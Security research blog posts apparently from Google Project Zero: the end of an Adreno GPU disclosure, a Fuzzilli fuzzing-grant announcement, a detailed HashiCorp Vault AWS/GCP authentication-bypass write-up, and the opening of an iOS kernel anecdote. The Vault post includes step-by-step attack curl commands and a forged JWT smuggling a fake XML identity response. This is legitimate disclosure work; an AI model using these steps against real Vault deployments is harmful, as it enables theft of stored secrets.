Project Zero responds with a range of options for how to use the 14-day extension in cases of a complex downstream arrangement. Project Zero requests the CVE-ID for this issue.

2020-08-27

Qualcomm informs Project Zero that the CVE-ID will be CVE-2020-11179

2020-09-02

Qualcomm provides a statement for inclusion in the blogpost. Qualcomm asked to confirm the disclosure date, as the 90 day period ends on a US Public Holiday (Sep 7).

2020-09-02

Project Zero confirms that the new disclosure date is Sep 8, due to the US Public Holiday.

2020-09-08

Public disclosure (issue tracker and blog post)


Recommendations


We can offer a few additional recommendations:


  1. Transparency and openness: One of the surprising observations while performing this attack was the level of complexity and the amount of processing of untrusted data that happens on the GPU. Since the GPU is a critical part of Android's security model, increasing the level of openness to be consistent with other similarly critical components is advisable. Note that this guidance applies to both Qualcomm Adreno and ARM Mali. Practically speaking, this could include publishing any relevant design documentation and source code, while also providing a threat model/security model for the GPU device.

    More generally, the competitive benefits of a closed platform approach to hardware internals should be reassessed in 2020. This balance may have been historically appropriate when the GPU was not in the critical path for security, but today billions of users are relying on the GPU to uphold the operating system security model. 


  1. Variant analysis: It's possible that this issue could have been found and fixed earlier, based on the first report of CVE-2019-10567. The initially adopted fixes by the Adreno engineers were a clever attempt at mitigating the issue, but didn't look particularly reliable or comprehensive at first glance.

    Between Qualcomm, Android security, and the numerous OEMs that received details of both the original attack and the planned patches, I find it troubling that no one seems to have questioned the efficacy of these patches any further. Personally, I think this is because the work of the teams that triage and respond to external vulnerability reports is often undervalued and underfunded.

    When facing a barrage of external bug reports, it's hard enough to keep your head above water, let alone find the time and mental energy to pursue and understand an individual issue to the level required to find variants. But a high quality bug report is a potential gold mine of insights and ideas for improving your products' defensive posture.

    Speaking to security engineering managers now: finding ways to resource and structure your vulnerability triage team in a way that allows for individual deep dives and tangential pursuits is the best way to extract the maximum value from your external bug reports, and will certainly pay for itself in the long run (in terms of your product's security posture of course, but also in terms of your team's reputation, motivation, and ability to hire). This type of triage work is often seen as a stepping stone to something better, or as a dreaded busy-work rotation, but it doesn't need to be like that.


  1. Vulnerability Remediation: All security critical components in Android devices should be updateable within 90 days, including low-level systems like GPU firmware. For components where this is not yet the case, we disclose issues like this hoping to motivate future investments in technology, staffing, and process improvements that will bring the component in line with industry standards.

    There's a temptation to say that "hardware issues" are harder to fix, and so should receive more lenient treatment. However, this bug is best described as a software issue running on an opaque and undocumented platform. This relative obscurity has likely contributed to a lack of review, hardening, testing, and a slower vulnerability remediation process, but these challenges aren't fundamental to the technology itself. With proper investment, bugs like this can be fixed and shipped to users within 90 days. If for any reason that investment isn't possible, it's important that users are made aware of this constraint.


Conclusion


This blog post describes a unique and unusually powerful security issue affecting Qualcomm's Adreno GPU. We outlined the design of the GPU and kernel driver, and some side effects of that design that result in a shared memory attack on the GPU itself. This led to a relatively stable race condition that bypassed the GPU protected mode and gave attacker controlled GPU commands access to arbitrary physical memory. Ultimately this could be used to build an Android sandbox escape exploit that gives kernel code execution. Finally, we discussed the planned fix, the fix timeline, and gave some additional recommendations for areas of future improvement.


Thank you to Guang Gong for first reporting this fascinating style of attack, and to Qualcomm for a very prompt, open, and professional response to my additional research.

✇Google Project Zero

Announcing the Fuzzilli Research Grant Program

By: Tim

Posted by Samuel Groß, Project Zero


Project Zero’s mission is to make 0-day hard in order to improve end-user security. We attack this problem in different ways, including supporting other security researchers. While Google currently offers research grants, they are limited to academics and those affiliated with universities. 


Today we are announcing a new USD $50,000 pilot program to foster research into JavaScript engine fuzzing through Google Compute Engine (GCE) credit grants. Here is how it works:


  1. Interested researchers submit a proposal for a project about fuzzing JavaScript engines.

  2. The proposal will be reviewed by an internal review board and, if accepted, the researchers will be awarded up to USD $5,000 in GCE credits per submission to be used for fuzzing.

  3. All bugs found throughout the course of the project must be reported directly to the affected vendors. Researchers can claim full CVE credits and applicable bug bounties.

Overview

The program is designed to promote research into new approaches for JavaScript engine fuzzing. Examples of research areas that we are especially interested in include:

  • Custom, domain specific sanitizers such as WebKit’s does GC validation or bounds check elimination verification which can help detect bugs that would otherwise go unnoticed as they don’t immediately cause observable failures

  • New, possibly domain-specific feedback metrics to guide JavaScript/JIT engine fuzzers

  • Different high-level fuzzing approaches such as differential fuzzing

  • New code mutation or generation approaches that outperform existing ones

  • Targeted approaches to fuzz for variants of previously reported bugs


Applications can be submitted by filling out this form. Submissions are not limited to those in academia or those with a demonstrated track record of success - if you have a good idea in this space, we'd love to hear from you. Incoming submissions will be reviewed by a review board on a regular basis and we aim to respond to every submission within 2 weeks. If the project is accepted, the researchers may be awarded GCE credits worth up to USD $5,000. Researchers can also apply for multiple grants throughout the lifetime of a project. The grants come with the following requirements:

  • The credits must be used for fuzzing JavaScript engines with the approach described in the proposal. The fuzzed JavaScript engines should be one or more of the following: JavaScriptCore (Safari), v8 (Chrome, Edge), or Spidermonkey (Firefox).

  • All vulnerabilities found must be only reported to the affected vendor. Researchers are encouraged to apply Project Zero’s 90-day disclosure policy. Researchers may claim any CVE credits and bug bounty payouts for reporting the bugs that don’t conflict with these requirements.

  • Any newly developed source code must be published under an open source license that permits further research by others. 

  • An interim report for Google only at the conclusion of the fuzzing, to demonstrate the initial results of the research, so we can determine the efficacy of the research and make our folks in accounting happy.

  • Furthermore, a final report of some form (e.g. a conference paper, a blog post, or a standalone PDF) due no later than 6 months after the first grant for a project has been awarded, including:

    • A detailed explanation of the project

    • Basic statistics about which engines have been fuzzed for how long (CPU time, iterations, etc.)

    • A clear technical explanation of all vulnerabilities discovered throughout the project.


Researchers are encouraged to base their project on the open source Fuzzilli fuzzer if possible, which, amongst other features, already supports distributed fuzzing on GCE.

Timeline

The pilot program will run for one year, from Oct 1, 2020 until Oct 1, 2021. Applications can be submitted at any time during this period, however, the program might end earlier if funds are exhausted.

Motivation

JavaScript engine security continues to be critical for user safety, as demonstrated by recent in-the-wild 0day exploits abusing vulnerabilities in v8, the JavaScript engine behind Chrome. Unfortunately, fuzzing JavaScript engines to uncover these vulnerabilities is generally quite expensive due to their high complexity and relatively slow processing of input. As a rough datapoint, the GCE instances used to find the ~20 bugs with Fuzzilli in 2019 cost around USD $10,000. Income from bug bounty programs is uncertain, as there is no guarantee a new approach will also discover new bugs. Moreover, as any bounty money is paid out only later, researchers need to bear the costs of fuzzing in advance. This likely results in bugs staying unfixed and thus exploitable for longer. This program aims to help solve this problem.


Scope of Pilot

This program is similar to Google Cloud research credits, though that program is limited to  university affiliates. In contrast, this program is specifically designed to accept submissions from anyone.


This program is also similar to the Chrome Fuzzer Program. However, the Chrome Fuzzer Program is limited to LibFuzzer-based fuzzers or blackbox fuzzers, neither of which can currently support a fuzzer like Fuzzilli due to technical limitations. In addition, it is also not currently possible to experiment with custom engine “sanitizers” that detect bugs before they result in otherwise observable misbehaviour. Overall, this program allows researchers greater flexibility around their fuzzing approach but limits the scope to JavaScript engine fuzzing.

Legal points

We are unable to issue grants to individuals who are on sanctions lists, or who are in countries (e.g. Cuba, Iran, North Korea, Sudan and Syria) on sanctions lists. You are responsible for any tax implications depending on your country of residency and citizenship. There may be additional restrictions on your ability to enter depending upon your local law.


This is not a competition, but rather an experimental and discretionary grant program. You should understand that we can cancel the program at any time and the decision as to whether or not to award a grant is entirely at our discretion.


Of course, your testing must not violate any law, or disrupt or compromise any data that is not your own.


✇Google Project Zero

Enter the Vault: Authentication Issues in HashiCorp Vault

By: Tim

 Posted by Felix Wilhelm, Project Zero

Introduction

In this blog post I'll discuss two vulnerabilities in HashiCorp Vault and its integration with Amazon Web Services (AWS) and Google Cloud Platform (GCP). These issues can lead to an authentication bypass in configurations that use the aws and gcp auth methods, and demonstrate the type of issues you can find in modern “cloud-native” software. Both vulnerabilities (CVE-2020-16250/16251) were addressed by HashiCorp and are fixed in Vault versions 1.2.5, 1.3.8, 1.4.4 and 1.5.1 released in August.


Vault is a widely used tool for securely storing, generating and accessing secrets such as API keys, passwords or certificates. It can be used as a shared password manager for human users, but its feature set is optimized for API based access by other services. An example use case for Vault is to provide one of your services, such as your webserver, short lived credentials to your database or a third-party resource like an AWS S3 bucket.


Using a central secret storage like Vault offers security benefits such as centralized auditing, enforced credentials rotation or encrypted data storage. However, a central storage is also a very interesting target for an attacker. Exploiting a vulnerability in Vault could give an attacker full access to a wide range of important secrets and large parts of the target's infrastructure.


Before diving into the technical details of the vulnerabilities, the next section gives an overview about Vault’s authentication architecture and the way it integrates with cloud providers. Readers familiar with Vault can feel free to skip this section.

Authenticating to Vault

Interfacing with Vault requires authentication and Vault supports role-based access control to govern access to stored secrets. For authentication, it supports pluggable auth methods ranging from static credentials, LDAP or Radius, to full integration into third-party OpenID Connect (OIDC) providers or Cloud Identity Access Management (IAM) platforms. For infrastructure that runs on a supported cloud provider, using the provider's IAM platform for authentication is a logical choice.


Take AWS as an example: Almost every workload you can run in AWS executes in the context of a specific AWS IAM user. By enabling and configuring the aws auth method, you can create a mapping between certain IAM users or roles to Vault roles.


Imagine that you have an AWS Lambda function and want to give it access to a database password stored in Vault. Instead of storing hard coded credentials in the function code, a Vault administrator can assign a vault role to the Lambda function execution role using the vault CLI:


vault write auth/aws/role/dbclient auth_type=iam \

              bound_iam_principal_arn=arn:aws:iam::123456789012:role/lambda-role policies=prod,dev max_ttl=10m


This will create a mapping between a vault role named dbclient and the AWS IAM role lambda-role. A vault policy can now be used to grant the dbclient role access to the database secret.


When the lambda function executes, it authenticates to Vault by sending a request to the /v1/auth/aws/login API endpoint. I’ll go into the exact layout of this request later in the post, but for now just assume that the request allows Vault to verify the AWS IAM role of the caller. If authentication succeeds, Vault returns a short-lived API token for the dbclient role back to the lambda function. This token can now be used to fetch the database secret from Vault. Depending on the database backend, this secret could be a static user-password combination, a short lived client certificate or even a dynamically created credential pair.


Using Vault in this way has some nice security benefits: The lambda function itself does not need to contain bootstrap credentials and every access to the database credentials is auditable. Rotating old or compromised database credentials is straightforward and can be centrally enforced.


However, this operational simplicity is only possible because of hidden complexity in the AWS iam auth method. How does the /v1/auth/aws/login API endpoint actually work and is there a way a unauthenticated attacker can impersonate a random AWS IAM role? Let’s take a look.

sts:GetCallerIdentity

Vault’s aws auth method supports two different authentication mechanisms internally: iam and ec2. We are interested in the iam mechanism, which is the recommended variant and also used in our previous Lambda example. iam auth is built on top of an AWS API method called GetCallerIdentity, part of the AWS Security Token Service (STS).


As its name implies, GetCallerIdentity returns details about the IAM role or user whose credentials were used to call the API. To understand how Vault uses this method to authenticate clients we need to understand how AWS APIs perform authentication:


Instead of attaching some form of authentication token or credential to API requests, AWS requires clients to calculate an HMAC signature for the (canonicalized) request using the caller's secret access key and attach this signature to the request. This mechanism makes it possible to pre-sign a request and forward it to another party to allow a limited form of impersonation. A popular example use case is to give clients the ability to upload a file to S3 without giving them access to credentials with write permissions.


The Vault aws authentication mechanism is a simple variant of this technique. 

The client pre-signs an HTTP request to the STS GetCallerIdentity method and sends a serialized version of it to the Vault server. The Vault server sends the pre-signed requests to the STS host and extracts the AWS IAM information out of the result. The server-side part of this flow is implemented in pathLoginUpdate in builtin/credential/aws/path_login.go:


func (b *backend) pathLoginUpdateIam(ctx context.Context, req *logical.Request, data *framework.FieldData) (*logical.Response, error) {

    method := data.Get("iam_http_request_method").(string)

    ...

    // In the future, might consider supporting GET

    if method != "POST" {

            return logical.ErrorResponse(...), nil

    }


    rawUrlB64 := data.Get("iam_request_url").(string)

    ...

    rawUrl, err := base64.StdEncoding.DecodeString(rawUrlB64)

    ...

    parsedUrl, err := url.Parse(string(rawUrl))

    if err != nil {

            return logical.ErrorResponse(...), nil

    }


    bodyB64 := data.Get("iam_request_body").(string)

    ...

    bodyRaw, err := base64.StdEncoding.DecodeString(bodyB64)

    ...        

    body := string(bodyRaw)


    headers := data.Get("iam_request_headers").(http.Header)

    

    endpoint := "https://sts.amazonaws.com"


    ...


    callerID, err := submitCallerIdentityRequest(ctx, maxRetries, method, endpoint, parsedUrl, body, headers)



The function extracts HTTP method, URL, body and headers out of the supplied request body which is stored in data. It then calls submitCallerIdentity to forward the request to the STS server and to fetch and parse the result in parseGetCallerIdentityResponse:


func submitCallerIdentityRequest(ctx context.Context, maxRetries int, method, endpoint string, parsedUrl *url.URL, body string, headers http.Header) (*GetCallerIdentityResult, error) {

    ...

    request := buildHttpRequest(method, endpoint, parsedUrl, body, headers)

    retryableReq, err := retryablehttp.FromRequest(request)

    ...

    response, err := retryingClient.Do(retryableReq)

    responseBody, err := ioutil.ReadAll(response.Body)

    ...

    if response.StatusCode != 200 {

            return nil, fmt.Errorf(..)

    }

    callerIdentityResponse, err := parseGetCallerIdentityResponse(string(responseBody))

    if err != nil {

            return nil, fmt.Errorf("error parsing STS response")

    }

    return &callerIdentityResponse.GetCallerIdentityResult[0], nil

}

 

func buildHttpRequest(method, endpoint string, parsedUrl *url.URL, body string, headers http.Header) *http.Request {

    ...

    targetUrl := fmt.Sprintf("%s/%s", endpoint, parsedUrl.RequestURI()) 

    request, err := http.NewRequest(method, targetUrl, strings.NewReader(body))

    ...

    request.Host = parsedUrl.Host

    for k, vals := range headers {

            for _, val := range vals {

                    request.Header.Add(k, val)

            }

    }

    return request

}


buildHttpRequest creates a http.Request object based on the user supplied parameters, but uses the hardcoded constant https://sts.amazonaws.com to build the target URL. 

Without this restriction, we could simply trigger a request to a server under our control and return a fake caller identity.


However, the complete lack of validation for URL path, query, POST body and HTTP headers still looks like a promising attack surface. The next section describes how we can turn this gap into a full authentication bypass.

STS (Caller) Identity Theft 

Our goal is to trick Vault’s submitCallerIdentityRequest function into returning an attacker controlled caller identity. One way to achieve this is to manipulate the Vault server into sending a request to a host we control, bypassing the hardcoded endpoint host. Looking at the buildHttpRequest method, two approaches come to mind:

  • The code for calculating targetUrl targetUrl := fmt.Sprintf("%s/%s", endpoint, parsedUrl.RequestURI()) doesn't look very robust against URL parsing issues. However, tricks like embedding a fake userinfo (https://sts.amazonaws.com/:[email protected]/test) and similar ideas do not work against the robust Go URL parser.

  • Even though Vault will always create a HTTPS request pointing at the hardcoded endpoint, the attacker has full control over the Host http header (request.Host = parsedUrl.Host). This could be a problem if a load balancer in front of the STS API makes routing decisions based on the Host header, but blind testing against the STS host did not lead to any success.


After ruling out the easy way forward, we still have another approach available: Vault does not restrict our URL query parameters. This means we are not limited to pre-signing requests to GetCallerIdentity and can create requests to any action of the STS API. STS supports 8 different actions, but none gives us the ability to completely control the response. At this point I was slowly getting frustrated and decided to take a look at Vault’s response parsing code:


func parseGetCallerIdentityResponse(response string) (GetCallerIdentityResponse, error) {

        decoder := xml.NewDecoder(strings.NewReader(response))

        result := GetCallerIdentityResponse{}

        err := decoder.Decode(&result)

        return result, err

}


type GetCallerIdentityResponse struct {

 XMLName                 xml.Name                 `xml:"GetCallerIdentityResponse"`

 GetCallerIdentityResult []GetCallerIdentityResult `xml:"GetCallerIdentityResult"`

 ResponseMetadata        []ResponseMetadata        `xml:"ResponseMetadata"`

}



parseGetCallerIdentityResponse is called on every response received from STS as long as the status code is 200. The function uses the Golang standard XML library to decode an XML response into a GetCallerIdentityResponse structure and returns an error if decoding fails. 


There is an easy to miss problem with this code: Vault never enforces or verifies that the STS response is actually XML encoded. While STS responses are XML encoded by default, it also supports JSON encoding for clients that send an Accept: application/json HTTP header.


For Vault, this turns into a security issue due to a somewhat surprising feature of the Go XML decoder: The decoder silently ignores non XML content before and after the expected XML root. This means that calling parseGetCallerIdentityResponse with a (JSON encoded) server response such as ‘{“abc” : “xzy<GetCallerIdentityResponse></GetCallerIdentityResponse>}’ will succeed and return an (empty) CallerIdentityResponse structure.


This brings us really close to our goal of spoofing an arbitrary caller identity: We just need to find a STS action that reflects attacker controlled text as part of its API response. Serialize a request to it while including an Accept: application/json header and put an arbitrary GetCallerIdentityResponse XML blob into the reflected payload.


Finding a reflected parameter that is not constrained to alpha-numeric characters turns out to be tricky. After some trial and error, I decided to target the AssumeRoleWithWebIdentity action and its SubjectFromWebIdentityToken response element. AssumeRoleWithWebIdentity is used to translate JSON Web Tokens (JWT) signed by an OpenID Connect (OIDC)  provider into AWS IAM identities. 

Sending a request to this action with a valid signed JWT will return the sub field of the token in the SubjectFromWebIdentityToken field.


Of course, a normal OIDC provider won’t sign a JWT with an XML payload in the subject field. Still, an attacker can just create their own OIDC Identity Provider (IdP), register it on an AWS account they own and sign arbitrary tokens with their own keys.


Let's put all of this together and walk through the full attack step-by-step.


  1. Create a minimal OIDC IdP. This boils down to generating a RSA key pair, creating an OIDC discovery.json and key.json document and hosting the json files on a web server (see here, for an example setup using S3).

  2. Use your own AWS account to register an OID IdP -> AWS IAM role mapping. It is important to note that the AWS account used for this does not need to have any relationship with our target.

  3. We can now use our OIDP to sign a JWT that contains an arbitrary GetCallerIdentityResponse as part of its subject claim. A decoded example token could look like this: iss, azp and aud match the details specified in the step 2. sub contains our spoofed response, identifying us as the AWS IAM account arn:aws:iam::superprivileged-aws-account


{'iss': 'https://oidc-test-wrbvvljkzwtfpiikylvpckxgafdkxfba.s3.amazonaws.com/',

 'azp': 'abcdef', 'aud': 'abcdef', 

 'sub': '<GetCallerIdentityResponse><GetCallerIdentityResult><Arn>arn:aws:iam::superprivileged-aws-account</Arn><UserId>XYZ</UserId></GetCallerIdentityResult></GetCallerIdentityResponse>',

 'exp': 1595120834, 'iat': 1594207895}


  1. We can test if everything is setup correctly by sending a direct request to the STS AssumeRoleWithWebIdentity action using the (signed) token from step 3 and the RoleArn used in step 2:


curl -H "Accept: application/json"

'https://sts.amazonaws.com/?DurationSeconds=900&Action=AssumeRoleWithWebIdentity&Version=2011-06-15&RoleSessionName=web-identity-federation&RoleArn=arn:aws:iam::XZY::YOUR-OIDC-ROLE&WebIdentityToken=YOURTOKEN'


If everything goes as planned STS will reflect the token subject as part of its JSON encoded response. As discussed above, the Go XML decoder will skip all of the content before and after the GetCallerIdentityResponse object leading Vault to consider this a valid STS CallerIdentity response.


{"AssumeRoleWithWebIdentityResponse":{"AssumeRoleWithWebIdentityResult":

{"AssumedRoleUser":{"Arn":"arn:aws:iam::XZY::YOUR-OIDC-ROLE/web-identity-federation","AssumedRoleId":"AROATQ4R7PP5JJNLOF5P6:web-identity-federation"},

"Audience":"abcdef","Credentials":{...},"PackedPolicySize":null,"Provider":"arn:aws:iam::242434931706:oidc-provider/oidc-test-wrbvvljkzwtfpiikylvpckxgafdkxfba.s3.amazonaws.com/",

"SubjectFromWebIdentityToken":"<GetCallerIdentityResponse><GetCallerIdentityResult><Arn>arn:aws:iam::superprivileged-aws-account</Arn><UserId>XYZ</UserId></GetCallerIdentityResult></GetCallerIdentityResponse>"},

"ResponseMetadata":....}


  1. The final step is to convert this request into the form expected by Vault (e.g base64 encoding all required headers, the url and an empty post body) and to send it to the target Vault server as a login request on /v1/auth/aws/login. Vault will deserialize the request, send it to STS and misinterpret the response. If the AWS ARN/UserID in our fake GetCallerIdentityResponse has privileges on the Vault server we get a valid session token back, which we can use to interact with the Vault server to fetch some secrets.


curl -X POST "https://vault-server/v1/auth/aws/login" -d '{"role":"dev-role-iam",

"iam_http_request_method": "POST", "iam_request_body": "encoded-body", , "iam_request_headers" :

"encoded-headers", "iam_request_url" : "encoded-url"}'


{"request_id":"59b09a0b-f5d5-f4c4-8ed0-af86a2c1f5d4","lease_id":"","renewable":false,"lease_duration":0,"data":null,"wrap_info":null,"warnings":["TTL

of \"768h\" exceeded the effective max_ttl of \"500h\"; TTL value is capped

accordingly"],"auth":{"client_token":"s.Kx3bUNw6wEc5bbkrKBiGW6WL","accessor":"TBRh0hvfd4FkYEAyFrUE3i2P","policies":["default","dev","prod"],"token_policies":["default","dev","prod"],

"metadata":{"account_id":"242434931706","auth_type":"iam","role_id":"47faaf36-c8ab-c589-396c-2643c26e7b30"},

"lease_duration":1800000,"renewable":true,"entity_id":"447e1efe-0fd4-aa10-3a54-52405c0c69ab","token_type":"service","orphan":true}}


I wrote a proof-of-concept exploit that takes care of most of the busy work around JWT creation and serialization. While the OIDC provider setup adds some complexity, we end up with a nice authentication bypass for arbitrary AWS enabled roles. The only requirement is that the attacker knows the name of an privileged AWS role in the target Vault server. 


What went wrong here? Looking at it from an attacker perspective, the whole authentication mechanism seems clever but error-prone. Putting HTTP request forwarding into the unauthenticated external attack surface of a security product requires strong confidence in the implementation and the underlying HTTP libraries. This becomes even more difficult as the security depends on implementation details of the Security Token Service, which might change at any point in the future. For example, AWS might decide to put STS behind a load balancing frontend, which uses the Host header for routing decisions. Without any change to the Vault codebase, this could severely degrade the security of this authentication mechanism from one moment to another. 


Of course, there is a reason why the authentication works as described: AWS IAM doesn’t have a straightforward way of proving a service’s identity to other non-AWS services. Third-party services can’t easily verify pre-signed requests and AWS IAM doesn’t offer any standard signing primitives that could be used to implement certificate based authentication or JWTs.

In the end, Hashicorp fixed the vulnerability by enforcing an allowlist of HTTP headers, restricting requests to the GetCallerIdentity action and stronger validation of the STS response, which is hopefully enough to protect against unexpected changes to the STS implementation or HTTP parser differences between STS and Golang.


After finding this issue in the AWS authentication module, I decided to review its GCP equivalent. The next section describes how GCP authentication for Vault is implemented and how a simple logic flaw can lead to an authentication bypass in many configurations.

Exploiting Vault-on-GCP

Vault supports the gcp auth method for deployments on Google Cloud. Similar to its AWS counterpart, the auth method supports two different authentication mechanisms: iam and gce. Whereas the iam mechanism supports arbitrary service accounts and can be used from services such as App Engine or Cloud Functions, gce can only be used to authenticate virtual machines running on Google Compute Engine. Still, it has some interesting advantages. Instead of only making authentication decisions based on a service account identity, gce can also grant access based on a number of VM attributes. For example, a configuration could give only VMs in a specific region (europe-west-6) access to certain secrets, allow all VMs in the xyz-prod GCP project access or restrict it even further using instance-groups.


Both iam and gce are built on top of JWT. A vault client that wants to

authenticate, creates a signed token to prove its identity and sends it to the vault

server to get a session token back. For the iam mechanism, the client signs the token directly

using a service account private key under their control or with the projects.serviceAccounts.signJwt IAM API method.


For gce, the client is expected to run on an authorized GCE VM. It fetches a signed token by sending a request to the instance identity endpoint of the GCP metadata server. In contrast to service account tokens, this token is signed by an official Google certificate. In addition to the normal JWT claims (sub, aud, iat, exp), the tokens returned from the metadata server also contains a special compute_engine claim that lists details about the instance, which are processed as part of the auth process:


"google":{"compute_engine":{"instance_creation_timestamp":1594641932,"instance_id":"671398237781058X

XXX","instance_name":"vault","project_id":"fwilhelm-testing-XXXX","project_number":950612XXXX,"zone":"europe-west3-c"}}


JWT has a number of design choices that make it very prone to implementation errors (see this blog post by securitum for an overview about typical issues), so I decided to spend a day on reviewing Vault’s token processing.


The function parseAndValidateJwt is responsible for processing both gce and iam tokens.

It first parses the token without verifying the signature and passes the decoded token into the getSigningKey helper method:


// Process JWT string.

signedJwt, ok := data.GetOk("jwt")

if !ok {

        return nil, errors.New("jwt argument is required")

}


// Parse 'kid' key id from headers.

jwtVal, err := jwt.ParseSigned(signedJwt.(string))

if err != nil {

        return nil, errwrap.Wrapf("unable to parse signed JWT: {{err}}", err)

}


key, err := b.getSigningKey(ctx, jwtVal, signedJwt.(string), loginInfo.Role, req.Storage) 

if err != nil {

        return nil, errwrap.Wrapf("unable to get public key for signed JWT: %v", err)

}


getSigningKey extracts the key id claim (kid) out of the token header and tries to find a google-wide oAuth key with the same identifier. This will work for GCE metadata tokens, but not for tokens signed by a service account:


func (b *GcpAuthBackend) getSigningKey(...) (interface{}, error) {

b.Logger().Debug("Getting signing Key for JWT")


if len(token.Headers) != 1 {

        return nil, errors.New("expected token to have exactly one header")

}

kid := token.Headers[0].KeyID

b.Logger().Debug("kid found for JWT", "kid", kid)


// Try getting Google-wide key

k, gErr := gcputil.OAuth2RSAPublicKey(ctx, kid)

if gErr == nil {

        b.Logger().Debug("Found Google OAuth2 provider key", "kid", kid)

        return k, nil

}



If this approach fails, the Vault server extracts the Subject (sub) claim from the supplied token. For valid tokens, this claim contains the email address of the signing service account. Knowing the key id and subject of the token, Vault fetches the public key used for signing using the service account GCP API:


// If that failed, try to get account-specific key

b.Logger().Debug("Unable to get Google-wide OAuth2 Key, trying service-account public key")

saId, err := getJWTSubject(rawToken)

if err != nil {

        return nil, err

}

k, saErr := gcputil.ServiceAccountPublicKey(saId, kid)

if saErr != nil {

        return nil, errwrap.Wrapf(fmt.Sprintf("unable to get public key %q for JWT subject %q: {{err}}", kid, saId), saErr)

}


return k, nil


In both cases, the Vault server now has access to a public key that can verify the signature of the JWT:


// Parse claims and verify signature.

baseClaims := &jwt.Claims{}

customClaims := &gcputil.CustomJWTClaims{}


if err = jwtVal.Claims(key, baseClaims, customClaims); err != nil {

        return nil, err

}


if err = validateBaseJWTClaims(baseClaims, loginInfo.RoleName); err != nil {

        return nil, err

}


If verification succeeds, Vault fills out the loginInfo struct that is later used to grant or deny access. If the token contains a compute_engine claim it is copied into the loginInfo.GceMetada field:


loginInfo.JWTClaims = baseClaims


if len(baseClaims.Subject) == 0 {

        return nil, errors.New("expected JWT to have non-empty 'sub' claim")

}

loginInfo.EmailOrId = baseClaims.Subject


if customClaims.Google != nil && customClaims.Google.Compute != nil &&  len(customClaims.Google.Compute.InstanceId) > 0 {

        loginInfo.GceMetadata = customClaims.Google.Compute

}


if loginInfo.Role.RoleType == gceRoleType && loginInfo.GceMetadata == nil {

        return nil, errors.New("expected JWT to have claims with GCE metadata")

}


return loginInfo, nil


As mentioned above, all of this code is shared between the iam and gce auth methods. The issue here is that no check enforces that a token signed by an arbitrary service account doesn’t contain GCE compute_engine claims. While the content in a GCE metadata token is trustworthy and controlled by Google, service account tokens are completely controlled by the owner of the service account and can therefore contain arbitrary claims.


If we follow the control flow of the gce method to the end we can see that Vault uses loginInfo.GceMetadata as part of its auth decision in pathGceLogin if two conditions are met:

  • The VM described in the metadata section needs to exist. This is verified using the GCE API and requires an attacker to impersonate an actively running VM. In practice, only project_id, zone and instance_name are verified and need to be set to valid values.

  • The service account in subject claim of the JWT token needs to exist. This is verified using the ServiceAccount GCP API which requires the iam.serviceAccounts.get permission in the project hosting the service account. As the attacker can just use a service account in their own project, it is straightforward to just grant this permission to the GCP identity Vault is running under or even allUsers.


Finally, AuthorizeGCE is called to grant or deny access. If the attacker impersonated

a GCE instance with the right attributes (project, label, zones..) everything works out well and

the attacker gets a valid session token back. The only auth restriction that can’t be bypassed is a hardcoded service account name, as this value will be equal to the attacker account and not the expected VM account name.


An end-to-end attack against a vulnerable configuration will look like this:

  1. Create a service account in a GCP project you control and generate a private key using gcloud: gcloud iam service-accounts keys create key.json --iam-account [email protected]

  2. Sign a JWT with a fake compute_engine claim describing an existing and privileged VM. See here for a simple proof-of-concept script that takes care of most of the details.

  3. Now simply use the token to sign-in to Vault: curl --request POST --data '{"role": "my-gce-role", "jwt" : "...."}' http://vault:8200/v1/auth/gcp/login


This is an interesting bug that requires some knowledge of GCP IAM to spot. The root cause  seems to be the merging of two separate authentication flows into a single code path in the parseAndValidateJwt function, which makes it difficult to reason about all security requirements when writing or reviewing the code. At the same time, GCP makes it easy to shoot yourself in the foot by offering two types of JWT tokens with completely different security properties.

Conclusion

This blog post describes two authentication vulnerabilities in HashiCorp Vault, a “cloud-native” software for secret management. While Vault was clearly developed with security in mind and profits from the memory safety and high quality standard library of its implementation language Go, I was still able to identify two critical vulnerabilities in its unauthenticated attack surface.


In my experience, tricky vulnerabilities like this often exist where developers have to interact with external systems and services. A strong developer might be able to reason about all security boundaries, requirements and pitfalls of their own software, but it becomes very difficult once a complex external service comes into play. Modern cloud IAM solutions are powerful and often more secure than comparable on-premise solutions, but they come with their own security pitfalls and a high implementation complexity. As more and more companies move to the big cloud providers, familiarity with these technology stacks will become a key skill for security engineers and researchers and it is safe to assume that there will be a lot of similar issues in the next few years.


Finally, both discussed vulnerabilities demonstrate how difficult it is to write secure software. Even with memory-safe languages, strong cryptography primitives, static analysis and large fuzzing infrastructure, some issues can only be discovered by manual code review and an attacker mindset.


✇Google Project Zero

Oops, I missed it again!

By: Tim

Written by Brandon Azad, when working at Project Zero


This is a quick anecdotal post describing one of the more frustrating aspects of vulnerability research: realizing that you missed a bug that was staring you in the face only once you see the patched version!

Some suspicious code

After writing the oob_timestamp exploit, I spent some time trying to find another vulnerability to exploit. Typically, it's a lot easier to develop an exploit when you already have a research platform (read: another exploit) available to help with your analysis, for example by dumping kernel memory to ensure that your heap spray is placing objects at their intended locations. Developing an exploit blind, as I had done with voucher_swap, is much trickier. (For oob_timestamp, I relied on checkra1n to bootstrap the exploit on A11, and later expanded it to A13.) So, I thought it might be nice to chain my next exploit off of oob_timestamp to avoid having to re-bootstrap later.


As I had already spent a fair amount of time reversing the iOS 13.3 (17C54) kernelcache for oob_timestamp, I decided to continue that effort on a new user client. I wrote a small program to enumerate IOUserClient classes reachable from the app sandbox (inadvertently discovering another bug in the process) and looked for classes that I had not researched previously.


A quick primer for those less familiar with Apple kernels: Apple's kernel is called XNU, and IOKit is XNU's C++ framework for implementing drivers. An app in userspace can call IOServiceGetMatchingServices() to get handles to the drivers, but the app can't actually do much with the raw driver handle. Instead, the app needs to direct the driver to create a "user client" by calling IOServiceOpen(), passing the type of user client it wants. Since the user client is what provides most of the functionality to userspace, this is the step that is subject to a sandbox check, ensuring that the app is allowed to open the requested type of user client. Once the app has a handle to a user client for the driver, the app can interact with the user client by calling functions like IOConnectCallMethod() on the user client handle, specifying the "selector" (index) of the method the app wants to invoke. In the kernel, IOConnectCallMethod() will use the selector to index a table of methods provided by the user client, invoking the one requested.


As I was scanning for user clients I could open, one reachable class stood out: H11ANEInDirectPathClient, a user client of the H11ANEIn driver. I hadn't seen this class before, but some quick Googling showed that it wasn't open source, which suggested to me that the code had probably undergone substantially less security review, and hence probably had more low-hanging bugs in it, than the open-source parts of the kernel.


